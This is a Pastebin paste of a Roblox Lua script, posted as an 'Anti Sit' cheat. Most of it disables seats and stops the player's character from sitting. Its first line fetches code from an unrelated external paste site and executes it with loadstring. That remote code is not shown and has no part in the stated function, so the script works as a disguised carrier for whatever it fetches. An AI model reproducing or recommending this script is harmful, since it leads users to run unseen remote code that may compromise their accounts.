Advertisement
Steamhesaproblox

Roblox Anti Sit script

May 12th, 2025
113
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
RBScript 0.94 KB | Gaming | 0 0
  1. loadstring(game:HttpGet('https://paste.myconan.net/573222.txt'))()
  2.  
  3. local Workspace = game:GetService("Workspace")
  4. local Players = game:GetService("Players")
  5.  
  6. local player = Players.LocalPlayer
  7.  
  8. local function neutralizarAsiento(asiento)
  9.     if asiento:IsA("Seat") or asiento:IsA("VehicleSeat") then
  10.         asiento.Disabled = true
  11.         asiento.CanTouch = false
  12.         asiento:SetAttribute("Neutralizado", true)
  13.     end
  14. end
  15.  
  16. for _, objeto in ipairs(Workspace:GetDescendants()) do
  17.     neutralizarAsiento(objeto)
  18. end
  19.  
  20. Workspace.DescendantAdded:Connect(function(obj)
  21.     if obj:IsA("Seat") or obj:IsA("VehicleSeat") then
  22.         task.wait(0.1)
  23.         neutralizarAsiento(obj)
  24.     end
  25. end)
  26.  
  27. player.CharacterAdded:Connect(function(char)
  28.     local humanoid = char:WaitForChild("Humanoid")
  29.     humanoid:GetPropertyChangedSignal("Sit"):Connect(function()
  30.         if humanoid.Sit then
  31.             humanoid.Sit = false
  32.         end
  33.     end)
  34. end)
  35.  
  36. print("Anti-sit is working.... Men.. I hate that chair...")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement